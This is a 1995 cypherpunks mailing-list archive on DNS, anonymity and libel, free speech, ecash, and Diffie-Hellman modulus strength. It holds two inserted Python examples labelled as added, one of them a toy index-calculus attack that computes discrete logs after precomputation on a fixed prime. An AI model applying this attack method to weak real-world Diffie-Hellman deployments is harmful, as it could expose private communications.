Community ConneXion is the premier internet privacy ISP. They offer
anonymous accounts, remailers, and pseudonym servers, in addition to
the standard ISP fare of webspace and dialup IP access. Information is
available from http://www.c2.org/ or from sending email to
info@c2.org.

Java and HotJava are trademarks of Sun Microsystems, Inc. Netscape and
Netscape Navigator are trademarks of Netscape Communications
Corporation. The Hack Java promotion is not affiliated with nor
sponsored by Sun Microsystems.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <dreschs@mpd.tandem.com>
Date: Mon, 6 Nov 1995 22:35:06 +0800
To: shields@tembel.org (Michael Shields)
Subject: Re: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511022000.OAA09507@galil.austnsc.tandem.com.>
Message-ID: <199511061406.IAA07351@galil.austnsc.tandem.com.>
MIME-Version: 1.0
Content-Type: text/plain


shields@tembel.org (Michael Shields) said:

MS> If the InterNIC yanked your domain, this would *not* affect your IP
MS> connectivity -- your ability to be reached by any Internet protocol
MS> via IP address.  The InterNIC has nothing at all to do with that.

	I never disputed that subverting the DNS system would affect the
ability to use numeric IP addresses, just IP names.  But knowing that
there are multiple 'root' DNS servers makes me a bit more comfortable.
But only a little bit - despite my being one of what is generally
referred to as the 'religious right', the pro-censorship tendencies of
the political 'leaders' pandering to it makes me very uncomfortable (the
"and when they came to censor me, no one was left to protest" concept
[with apologies to the writer of the original version referring to the
Holocaust]).

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 7 Nov 1995 01:18:06 +0800
To: cypherpunks@toad.com
Subject: SSL-encrypted apache web server available for beta-test
Message-ID: <199511061607.IAA07644@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I put together an SSL/Apache using mostly other people's work,
but some of my own. It's available for beta-test to use non-commercial
to US-persons. See http://www.c2.org/apachessl/

	The README is attached.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org
"I don't want to get into the t-shirt business."

	The release of Apache supports SSL, using Eric Young's SSLeay
package and RSADSI's RSAREF cryptography library. Ben Laurie
<ben@algroup.co.uk> wrote the interfaces to SSL within the Apache server,
which was developed by the Apache Group.

	This release of Apache-SSL is maintained by sameer
<sameer@c2.org>. For more information on sameer's releases of
Apache-SSL see http://www.c2.org/apachessl/.

	For more information on Apache see http://www.apache.org/

	For more information on SSLeay see
http://www.psy.uq.oz.au/~ftp/Crypto/

	For more information on RSAREF see http://www.rsa.com/

	Portions developed at the National Center for Supercomputing
Applications at the University of Illinois at Urbana-Champaign. This
product includes software developed by Ben Laurie for use in the
Apache-SSL HTTP server project.

	Use of this software is allowed for non-commercial use only,
as described in the RSAREF license. For information on commercial use
of this software, please see http://www.c2.org/apachessl/.

	This package is using Apache 0.8.14 -- not the most recent
version of Apache. While every effort will be made to keep this
package up to date with the most recent Apache version, that can not
be guaranteed.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Mon, 6 Nov 1995 21:58:57 +0800
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: Crypto++, Cpunk Icons, list noise
In-Reply-To: <9511061141.AA16901@all.net>
Message-ID: <Pine.3.89.9511060841.B27224-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 6 Nov 1995, Dr. Frederick B. Cohen wrote:

> In the United States, we have the right to express whatever view we
> wish, so long as it doesn't endanger others (e.g., incite to riot,
> scream "fire" in a crowded theater when there is no fire, etc.). 
> Everyone has an inherent right to question why a person seeks moments of
> anonymity or privacy. 

You're forgetting our good friends the libel laws. Another reason to go anon.
You have the right to say whatever you please, but you'll have to be able 
to defend it in court if it damages someone's reputation. It can also get 
you fired. (or shot if you're MLK) 

This is why it'd be so nice to see more idiot-friendly remailer clients
on windoze, or even better Java (does Private Idaho support Mixmaster yet?).
The average person can really benefit from easy anonymity, otherwise they 
won't bother and get in hot water.

Slander is in the eye of the beholder.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 6 Nov 1995 22:18:46 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: Crypto++, Cpunk Icons, list noise
In-Reply-To: <Pine.3.89.9511060841.B27224-0100000@tesla.cc.uottawa.ca>
Message-ID: <9511061335.AA24370@all.net>
MIME-Version: 1.0
Content-Type: text


s1113645@tesla.cc.uottawa.ca typed:

> On Mon, 6 Nov 1995, Dr. Frederick B. Cohen wrote:
> 
> > In the United States, we have the right to express whatever view we
> > wish, so long as it doesn't endanger others (e.g., incite to riot,
> > scream "fire" in a crowded theater when there is no fire, etc.). 
> > Everyone has an inherent right to question why a person seeks moments of
> > anonymity or privacy. 
> 
> You're forgetting our good friends the libel laws. Another reason to go anon.
> You have the right to say whatever you please, but you'll have to be able 
> to defend it in court if it damages someone's reputation. It can also get 
> you fired. (or shot if you're MLK) 

The anonymity will not protect you very well against libel laws.  The
provider will be sued for libel, and unless they reveal your identity,
they will likely lose in court.  If they cannot reveal the identity,
they will also likely lose the suit.  All the anonymous providers are
doing is giving you anonymity in exchange for their liability.  Even
international anonymity systems are not immune to such threats, as we have
been shown by the Church of whatever.

> This is why it'd be so nice to see more idiot-friendly remailer clients
> on windoze, or even better Java (does Private Idaho support Mixmaster yet?).
> The average person can really benefit from easy anonymity, otherwise they 
> won't bother and get in hot water.

If it's just a license to slander people, I don't want to support
anonymity.  There are valid reasons for remaining anonymous, but being
able to avoid liability for slander is not one of them.

> Slander is in the eye of the beholder.

Slander is in the realm of the courts to decide - at least in the U.S.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wiltship@iccu6.ipswich.gil.com.au (PeterWiltshire)
Date: Mon, 6 Nov 1995 06:49:26 +0800
To: cypherpunks@toad.com
Subject: Re: lp (134.222.35.2)?
Message-ID: <199511052237.JAA25268@iccu6.ipswich.gil.com.au>
MIME-Version: 1.0
Content-Type: text/plain


>
>Anonymous writes:
>> >  Notice that both messages went through an unnamed site -- 134.222.9.1 and
>> >  then a strangely-named site, "lp (134.222.35.2)"
>[...]
>> >  Now let me see ... which spy agencies are located in or near Virginia?
>

 A hopcheck from here puts these sites in Amsterdam, NL.

cheers

peter


                                             Flight to Quality
                                 Wiltshire Productions Pty Ltd
                              Brisbane, Queensland, Australia
               Intl Voice  61 7 3376 3535  Intl Fax  61 7 3279 4027
              Email wiltship@gil.com.au  PGP Key ID 3E584C7D
  PGP Fingerprint 01 03 FB F4 BE F8 2B F3 5D 84 6B 69 37 80 FE 10





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Mon, 6 Nov 1995 22:11:20 +0800
To: roger12@cam.org
Subject: Re: Magic Money
In-Reply-To: <951106025715_99002994@emout06.mail.aol.com>
Message-ID: <Pine.3.89.9511060823.A27224-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 6 Nov 1995 EWilhem@aol.com wrote:

> Where do I get the software, Please E-mail me at roger12@cam.org. I'd like
> the 
> evaluation software.
> 
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/applications/magic-money
It's freeware as far as I know.
Just curious folks, is anyone still using this? Was there ever any active 
playing with it? What's the story? (if there is one)

Ps. Is that the cam in Montreal?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 6 Nov 1995 22:24:54 +0800
To: cypherpunks@toad.com
Subject: Re: Keyed-MD5, and HTTP-NG
In-Reply-To: <199511060639.WAA20500@jobe.shell.portal.com>
Message-ID: <199511061357.IAA14010@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Someone adopting Detweiler's style writes:
> Hmmm, I guess (as usual) people weren't keeping up with the drafts.  It 
> really makes some of us outsiders wonder what the IETF actually does in 
> its gilded white towers.

Just so that people understand this is a Detweiler troll, and an
attempt by him to start up a flame war/fight.

The IETF is perhaps the single easiest technical standards
organization in the world to participate in. You join the mailing list
for any working group and you are as full a member as you can be. Show
up at any IETF meeting, and you are a full participant. All
discussions occur in the open, are posted on line, most meetings are
broadcast worldwide on the MBONE. All drafts are public, all documents
are free.

Detweiler of course knows this, but would like us to argue with him,
and hopefully with each other.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 7 Nov 1995 01:59:08 +0800
To: cypherpunks@toad.com
Subject: So much for free speech...
Message-ID: <acc37a5b03021004553e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:34 PM 11/6/95, s1113645@tesla.cc.uottawa.ca wrote:
>On Mon, 6 Nov 1995, Dr. Frederick B. Cohen wrote:
>
>> In the United States, we have the right to express whatever view we
>> wish, so long as it doesn't endanger others (e.g., incite to riot,
>> scream "fire" in a crowded theater when there is no fire, etc.).
>> Everyone has an inherent right to question why a person seeks moments of
>> anonymity or privacy.
>
>You're forgetting our good friends the libel laws. Another reason to go anon.
>You have the right to say whatever you please, but you'll have to be able
>to defend it in court if it damages someone's reputation. It can also get
>you fired. (or shot if you're MLK)


Sadly, the tradition of "free speech" is under assault. On many fronts. The
new "civil rights" laws are just one avenue for the suppression of what was
once considered free speech.

Submitted for your disapproval:

"13-year-old student arrested for racial slurs" (Santa Cruz Sentinel, p. 1,
3 November 1995)

by Michael Green, Redding Record Searchlight

"REDDING -- When a 13-year-old Redding student was arrested for allegedly
making racial slurs, police and school administrators said it was necessary
to maintain order and send a strong message against racism.

"But some legal experts take a dimmer view of the boy's arrest, saying that
calling someone names, even offensive ones, is not a crime and in fact is
constitutionally protected.

...


"The Redding-area boy, who is white, allegedly made racial insults toward a
12-year-old Hispanic student before being arrested last Thursday.

...

"Police Chief Bob Blankeship said he would encourage officers to use the
civil rights laws to stop racial harassment if prosecutors determine it is
appropriate.

...

"The boy was arrested on suspicion of violating the Hispanic student's
civil rights. Penal Code section 422.6 makes it a misdemeanor to interfere
with another person's rights or harm their property because of their race,
gender, religion, disability or sexual orientation."

-----

Wow! "Verbal abuse." Throw away the key. "Freedom does not mean the freedom
to think bad thoughts," as Big Bro once said.

If they don't get you for illegally using random numbers, they'll get you
for uttering incorrect words.

Back to reality. No word on whether prosecution will take place (I doubt
it...this will likely be dropped, now that the message has been sent to the
students, and now that civil rights folks are getting interested).

Children are usually not accorded full constitutional protections,
especially not in public schools, but this does not mean the police should
arrest those who utter the wrong words! (Maybe suspending the student,
though I certainly wouldn't do that.)

This is the "safe and secure" world we are in, where bad thoughts and bad
words are punished. Or threatened with lawsuits. Anarchy seems infinitely
preferable to me.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 6 Nov 1995 22:34:55 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto++, Cpunk Icons, list noise
In-Reply-To: <199511061050.CAA17098@jobe.shell.portal.com>
Message-ID: <199511061404.JAA14024@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



anonymous-remailer@shell.portal.com writes:
> Hmmm, I'm not sure that anyone has an inherent right to question WHY a
> person seeks moments of anonymity or privacy.

In your case, Detweiler, it appears to be because you want to cause us
to flame at each other and disrupt the list without our noticing who
is responsible. I'd say that is a questionable motive.

> Please allow me the boundary and dignity to choose when, where, and in 
> what form I choose to reveal myself.

You already have.

> P.S.  This post is in the public domain.
>                   C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
> 

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Mon, 6 Nov 1995 22:28:41 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto++, Cpunk Icons, list noise
In-Reply-To: <199511061050.CAA17098@jobe.shell.portal.com>
Message-ID: <Pine.3.89.9511060807.B27490-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 6 Nov 1995 anonymous-remailer@shell.portal.com wrote:

> And as the messenger, I (hope) I don't have anything to fear, from the NSA
> or any other foreign group that would seek to pursue its own agenda within
> the borders of sovereign Canada.  I really don't think that the NSA is
> "evil incarnate", as some list subscribers do.  They have their
> intelligence and know how to use it.  Usually, they use it prudently.
 
They have a nice friend (the author of Spyworld would say outpost) right here
in Ottawa at the Communications Security Establishment. They (CSE) seem to 
have done some recent spying on the opposition parties and Quebec 
separatists (so I vaguely recall having read in several places. I haven't 
gotten around to Spyworld yet). It was rather funny to see them 
recruiting on campus. If you're ever in town, they're just a bit past 
Carleton U. on Heron. (it doesn't say CSE on the signs, but the guy at the
gate will tell you so)

Try <http://www.cse.dnd.ca> it's a tad sparse, but entertaining all the same.
They have very friendly recruiting brochures. Like NSA, they're also an equal
opportunity employer (;-> ).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Tue, 7 Nov 1995 02:38:28 +0800
To: hugh@toad.com
Subject: New sendmail coming on toad.com; expect disruptions
Message-ID: <9511061822.AA28208@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hugh and I will be installing a new sendmail on toad over the next day
or two.  You can expect some delays and troubles from the list over
that period as we shake it down.  We hope that the result will be
faster and better service for y'all.

	John Gilmore





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 7 Nov 1995 02:53:56 +0800
To: tcmay@got.net
Subject: Re: So much for free speech...
In-Reply-To: <acc37a5b03021004553e@[205.199.118.202]>
Message-ID: <199511061833.KAA27054@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Tim May writes:
[...]
> Wow! "Verbal abuse." Throw away the key. "Freedom does not mean the freedom
> to think bad thoughts," as Big Bro once said.
[...]

Indeed. The conviction on my criminal record for verbal abuse is one
of the things that opened my eyes to the true state of "free speech"
in this country.

Raph

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBFAwUBMJ5U42RuKj5D5x2JAQH0BgF9FxkKs0cRM/Ri0yvUKTnu5Q/2QAaEFVcD
rU6aruVdEN+j3iXOF0ot3mNRqoKc3nYN
=03DF
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 7 Nov 1995 01:11:21 +0800
To: thad@hammerhead.com (Thaddeus J. Beier)
Subject: Re: lp ?
In-Reply-To: <199511061539.HAA04245@hammerhead.com>
Message-ID: <199511061605.LAA14164@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Thaddeus J. Beier writes:
> So, if this person was sending cryptographic codes from Switzerland
> to Israel, the code would have been imported to the US, then exported
> by UUNET.  They can't do that, can they?  Probably nobody would prosecute,
> but it might be something to threaten UUNET with if one of their Northern
> Virginia neighbors ever wanted something they couldn't get otherwise.

It isn't clear that telecoms treaties don't implicitly make this legal
in spite of the export regulations.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Tue, 7 Nov 1995 01:02:02 +0800
To: cypherpunks@toad.com
Subject: Re: censored? corrected [Steve Pizzo cited in The Spotlight]
Message-ID: <9511061509.AA10512@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:06 AM 11/6/95 -0600, Sten Drescher wrote:
>shields@tembel.org (Michael Shields) said:
>
>MS> If the InterNIC yanked your domain, this would *not* affect your IP
>MS> connectivity -- your ability to be reached by any Internet protocol
>MS> via IP address.  The InterNIC has nothing at all to do with that.
>
>	I never disputed that subverting the DNS system would affect the
>ability to use numeric IP addresses, just IP names.<snip>


  There has been a thought that's been in the back of my mind while reading
this thread. For example, at one time, the telephone companies used "names"
such as Klick 5-1234.  Later, they went to all numbers, i.e., 555-1234.
People balked, but they eventually got used to it.  There are other examples
not necessary to list here.
  If, however, the growth continues with people, not only accessing the net,
but getting domain names - doesn't it seem likely that, at some point, only
IP addresses will be left (or dumb domain names like http://www.stkdlcp.com)?
  Ergo, what is the problem with having a numerical URL?  After all, some
people's URL's (in name form) are not the easiest to remember.  In the long
run, numbers may be easier to remember.  Just think of how many numbers
(Soc. Sec. #'s; phone #'s; tax #'s, etc.) that we have committed to memory.
Plus, one doesn't have to worry about InterNIC yanking your domain - and
other related problems.
  Just my .02 cents worth....
  

********************************************************************
Lynne L. Harrison, Esq.
Poughkeepsie, New York 
lharrison@mhv.net

"Say not, 'I have found the truth', but rather, 'I have found a truth.'"
                         - Kahlil Gibran from "The Prophet"
********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: szabo@netcom.com (Nick Szabo)
Date: Tue, 7 Nov 1995 03:52:48 +0800
To: cypherpunks@toad.com
Subject: Recovering lost coins in ecash
Message-ID: <199511061916.LAA19291@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



> One problem a number of people have reported in DigiCash is disappearing
> money. Several people have reported that if a transfer is misconfigured
> the cash can flow out of the wallet, be rejected at the other end and
> disappear from the system - i.e. misprinted names on cheques mean lost cash!
 
These users need to learn the features of the software.  Backups of spent 
coins are retained in the payment history ledger.  Select the payment from
the ledger, and hit _Cancel_ to cancel the payment.   This credits the
lost coins to your account.

The story behind this (which is, alas, not so apparent to the user) is that
this essentially spends the coins at the bank, so that if they were lost, 
the amount will be credited to your account.  If the coins were already 
cleared and credited to the payee then you ask the payee for your money 
back (or to properly deliver the purchased service), relying on their 
business reputation (ie, complain loud and publicly if you don't get 
satisfaction).  For the latter case an escrow service would be a useful
third-party add-on to the basic ecash system, to allow exchanges in
larger amounts without incurring this risk from the payee.

This bit of electronic magic is one place where ecash is superior 
to physical cash -- but at the expense of not being obvious 
from the metaphor.  It also illustrates the superior flexibility of
online clearing -- double spending is used as an error recovery tool,
to find out whether the payment was in fact lost, rather than as an 
indication of fraud.

Nick Szabo                              szabo@netcom.com  
Internet commerce consultant
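
The cancel-as-deposit mechanism described in the message above, as an added example that is not part of the original post and is not DigiCash's protocol or API: a toy online-clearing bank where the payer's wallet keeps backup copies of paid-out coins and "cancel" simply tries to deposit them. The class names, the power-of-two coin values and the scenario are assumptions, and the blind signatures that real ecash uses to hide serial numbers from the bank are left out.

```python
import secrets


class Bank:
    """Online clearing: a coin is accepted only the first time it is deposited."""

    def __init__(self, balances):
        self.accounts = dict(balances)
        self.issued = {}     # serial -> value of every coin issued
        self.spent = set()   # serials that have already cleared

    def withdraw(self, account, amount):
        if self.accounts[account] < amount:
            raise ValueError("insufficient funds")
        self.accounts[account] -= amount
        coins, value = [], 1
        while amount:                      # one coin per set bit of the amount
            if amount & 1:
                serial = secrets.token_hex(8)
                self.issued[serial] = value
                coins.append((serial, value))
            amount >>= 1
            value <<= 1
        return coins

    def deposit(self, account, coin):
        """Credit the coin and return True, or return False if it already cleared."""
        serial, value = coin
        if self.issued.get(serial) != value:
            raise ValueError("not a coin issued by this bank")
        if serial in self.spent:
            return False
        self.spent.add(serial)
        self.accounts[account] += value
        return True


class Wallet:
    def __init__(self, bank, account):
        self.bank, self.account = bank, account
        self.coins = []
        self.ledger = []   # payment history, with backups of the spent coins

    def withdraw(self, amount):
        self.coins += self.bank.withdraw(self.account, amount)

    def pay(self, amount):
        """Return (payment_id, coins to send); the ledger keeps a backup copy."""
        chosen, remaining = [], amount
        for coin in sorted(self.coins, key=lambda c: -c[1]):
            if coin[1] <= remaining:
                chosen.append(coin)
                remaining -= coin[1]
        if remaining:
            raise ValueError("cannot make the exact amount from coins on hand")
        for coin in chosen:
            self.coins.remove(coin)
        self.ledger.append({"coins": list(chosen), "cancelled": False})
        return len(self.ledger) - 1, chosen

    def cancel(self, payment_id):
        """Deposit the backups into our own account.

        Returns (recovered, cleared): value credited back because the coins
        never reached the bank, and value the payee had already deposited,
        which has to be settled with the payee directly.
        """
        entry = self.ledger[payment_id]
        if entry["cancelled"]:
            raise ValueError("payment already cancelled")
        recovered = cleared = 0
        for coin in entry["coins"]:
            if self.bank.deposit(self.account, coin):
                recovered += coin[1]
            else:
                cleared += coin[1]
        entry["cancelled"] = True
        return recovered, cleared


def scenario():
    """Constructed run: a lost payment, a cleared payment, a half-cleared one."""
    bank = Bank({"alice": 20, "shop": 0})
    alice = Wallet(bank, "alice")
    alice.withdraw(15)
    lost_id, _ = alice.pay(5)                 # coins vanish in transit
    lost = alice.cancel(lost_id)
    paid_id, coins = alice.pay(10)            # shop deposits everything
    for coin in coins:
        bank.deposit("shop", coin)
    paid = alice.cancel(paid_id)
    alice.withdraw(3)
    half_id, coins = alice.pay(3)             # shop deposits only the first coin
    bank.deposit("shop", coins[0])
    half = alice.cancel(half_id)
    return lost, paid, half, dict(bank.accounts)
```
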




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
Date: Tue, 7 Nov 1995 01:46:44 +0800
To: perry@piermont.com
Subject: Re: Photuris Primality verification needed
In-Reply-To: <199511051607.LAA08575@jekyll.piermont.com>
Message-ID: <9511061646.AA25242@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


   X-Authentication-Warning: jekyll.piermont.com: Host localhost didn't use HELO protocol
   Cc: cypherpunks@toad.com, ipsec-dev@eit.com
   Reply-To: perry@piermont.com
   X-Reposting-Policy: redistribute only with permission
   Date: Sun, 05 Nov 1995 11:07:25 -0500
   From: "Perry E. Metzger" <perry@piermont.com>
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk

   "William Allen Simpson" writes:
   > Folks, I was somewhat disappointed in the response to our previous
   > requests for verification of the strength of the prime moduli.
   > 
   > Recently, someone asked for a smaller prime of only 512-bits for speed.
   > This is more than enough for the strength of keys needed for DES, 3DES,
   > MD5 and SHA.  Perhaps this would be easier to have more complete and
   > robust verification as well.

   I think that this is a very large mistake. Allow me to explain why.

   La Macchia (sp?) and Odlyzko (sp?) have a very nice result which shows
   that once you've done enough precalculation on a particular modulus,
   you can break any subsequent Diffie-Hellman operation performed on
   that modulus with (for our purposes) no effort. 512 bits is, from what
   I can tell, not far out of the realm of possibility for what someone
   could try to crack with current machines given enough effort.

Perry is correct; allow me to add some details.  The discrete log
problem is "brittle": for a given prime modulus p you have to spend a
lot of effort to calculate the first discrete log modulo p, but
subsequent discrete logs modulo p are easy to find.  Basically, you (a)
do a lot of precomputation to compute discrete logs for a set of
small(-ish) primes, and then (b) you combine these to find the
particular discrete log you're interested in.  For the second (and
subsequent) discrete logs modulo p you only have to do part (b), which
is pretty easy.

Our practical experiences with discrete logs suggest that the effort
required to perform the discrete log precomputations in (a) is slightly
more difficult than factoring a composite of the same size in bits.  In
1990-91 we estimated that performing (a) for a k-bit prime modulus was
about as hard as factoring a k+32-bit composite.  [Recent factoring work
has probably changed this a bit, but it's still a good estimate.]

Finally, remember that if the modulus in your application is public and
fixed (as it usually is) then you've got a very tempting target for me
to attack.  Once I do the precomputations I can break/subvert/read any
particular D-H exchange I want for little additional effort.  You have
to consider the amount of effort someone might bring to bear against
your entire system, not only against a particular transaction.  Breaking
a particular 512-bit RSA key might not be worth the effort if it just
gets me your encrypted e-mail (or whatever), but a 512-bit D-H modulus
in a widely deployed system is ripe for attack.

See our paper (available from http://www-swiss.ai.mit.edu/~bal/) for all
the juicy details.

					--bal
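
The two phases described in the message above, as a toy index-calculus sketch (an added example, not code from the post or from the paper it cites). It shows phase (a) being paid once per modulus and phase (b) being reused for every target. The 10-bit safe prime, generator and factor base are constructed for the demo, and the mod-2/mod-Q split is a shortcut that assumes P is a safe prime and G a primitive root.

```python
# Toy index calculus. P, G and BASE are constructed demo values.
P = 1019                      # safe prime: P = 2*Q + 1
Q = (P - 1) // 2              # 509, prime
G = 2                         # primitive root mod P
BASE = [2, 3, 5, 7, 11, 13]   # the "set of small(-ish) primes"

# G^Q == -1 and G^2 != 1, so G has order 2*Q and generates the whole group.
assert pow(G, Q, P) == P - 1


def smooth(n, base):
    """Exponent vector of n over base, or None if n has another prime factor."""
    exps = []
    for l in base:
        e = 0
        while n % l == 0:
            n //= l
            e += 1
        exps.append(e)
    return exps if n == 1 else None


def precompute(p=P, g=G, base=BASE):
    """Phase (a): logs of every factor-base prime. Done once per modulus.

    Each smooth g^k gives a relation k = sum(e_i * log l_i) mod (p-1).
    The system is solved mod q by Gauss-Jordan elimination; the mod-2 part
    comes from quadratic residuosity; the two are combined by CRT.
    Returns (logs, number_of_candidates_tried).
    """
    q = (p - 1) // 2
    rows = {}                 # pivot column -> reduced row (coeffs + rhs) mod q
    k = 0
    while len(rows) < len(base):
        k += 1
        exps = smooth(pow(g, k, p), base)
        if exps is None:
            continue
        row = [e % q for e in exps] + [k % q]
        for col, prow in rows.items():          # clear existing pivot columns
            if row[col]:
                f = row[col]
                row = [(a - f * b) % q for a, b in zip(row, prow)]
        lead = next((i for i, a in enumerate(row[:-1]) if a), None)
        if lead is None:                        # linearly dependent relation
            continue
        inv = pow(row[lead], -1, q)
        row = [a * inv % q for a in row]
        for col in rows:                        # keep the system fully reduced
            f = rows[col][lead]
            if f:
                rows[col] = [(a - f * b) % q for a, b in zip(rows[col], row)]
        rows[lead] = row
    logs = []
    for i, l in enumerate(base):
        a = rows[i][-1]                         # log mod q
        b = 0 if pow(l, q, p) == 1 else 1       # log mod 2: even iff l is a QR
        logs.append(a if a % 2 == b else a + q) # CRT, q is odd
    return logs, k


def individual_log(h, logs, p=P, g=G, base=BASE):
    """Phase (b): log of one target, reusing the precomputed table.

    Finds s with h * g^s smooth, then log h = sum(e_i * log l_i) - s.
    Returns (log, number_of_candidates_tried).
    """
    for s in range(p - 1):
        exps = smooth(h * pow(g, s, p) % p, base)
        if exps is not None:
            x = (sum(e * l for e, l in zip(exps, logs)) - s) % (p - 1)
            return x, s + 1
    raise ValueError("h is not in the group generated by g")


if __name__ == "__main__":
    logs, cost_a = precompute()
    print("phase (a): tried", cost_a, "exponents, table =", dict(zip(BASE, logs)))
    for secret in (123, 456, 789):              # constructed D-H secret exponents
        public = pow(G, secret, P)
        x, cost_b = individual_log(public, logs)
        print("phase (b): public", public, "-> log", x, "after", cost_b, "tries")
```

At this size both phases are instant; the point is structural: every exchange that shares the modulus shares the same table.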




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 7 Nov 1995 04:23:22 +0800
To: cypherpunks@toad.com
Subject: Re: Credentials Without Identity
Message-ID: <199511061951.LAA14798@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 13:35 11/5/95 +0100, Mats Bergstrom wrote:
>This applies very much so in Sweden too. It *is* illegal to maintain any
>database with 'information on persons' (like their email addresses) without
>approval from the Data Inspection. But it's an open secret that this law
>is broken on a massive front and no bureaucrat is really trying to uphold it.

So the address book I keep in my hip pocket is illegal!


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 7 Nov 1995 05:17:01 +0800
To: cypherpunks@toad.com
Subject: DejaNews all over again--a URL for Usenet Searching
Message-ID: <acc3adfa0702100476eb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I usually avoid passing on URLs of interesting sites, in the name of
conserving bandwidth (*), but this one really has me jazzed:

http://dejanews.com/

It allows searching of Usenet archives (a few months' worth, from what I
can see).

This was pointed out to me on the Cyberia list, by Eugene Volokh, who wrote:

"    Check out http://dejanews.com/ -- truly a remarkable service.
They index a huge number of Internet news groups, and let you search
through them for any word or words you want.

"    Want to know what people are saying about some new book?  About
some political topic?  Most importantly, about you behind your back?
Check it out!  Lots of fun, and a bit scary."

A good way for newcomers to find out what's been written on some topic that
interests them, or to see who's writing what. (I checked out the index for:
"Blacknet," "Chaum," and a bunch of other things...the possibilities are
endless, and I suspect this will be the URL I go to more often than any
other.)

--Tim May

(* Perhaps someday we might ask people what their favorite URLs are. We've
done polls on books, so why not URLs?)

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 7 Nov 1995 02:02:18 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Many Topics are Appropriate for Discussion Here
